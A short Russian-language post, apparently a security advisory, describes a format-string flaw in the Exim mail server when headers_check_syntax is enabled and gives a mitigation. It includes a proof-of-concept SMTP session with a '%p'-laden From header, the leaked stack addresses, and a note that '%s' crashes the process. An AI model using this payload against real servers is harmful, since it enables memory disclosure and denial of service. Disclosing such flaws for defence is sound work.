• Партнер

  • Exim - это агент передачи сообщений (Message Transfert Agent) использующийся в UNIX системах подключенных к интернету. Уязвимость работает только при включенной опции headers_check_syntax (по умолчанию она отключена).

    Exploit:

    Делаем следующее:

    lez:~$ /usr/sbin/exim -bS
    mail from:lez@lez
    rcpt to:hax0r@lez
    data
    From:@@%p%p%p%p%p%p%p%p%p%p

    После этого, в ответе мы увидим:

    550 Syntax error in 'From' header: domain missing or malformed: failing address is:
    @@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40

    Если изменить %p's на %s, то получим ошибку segfault.

    Для устранения не включайте опцию
    headers_check_syntax.

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии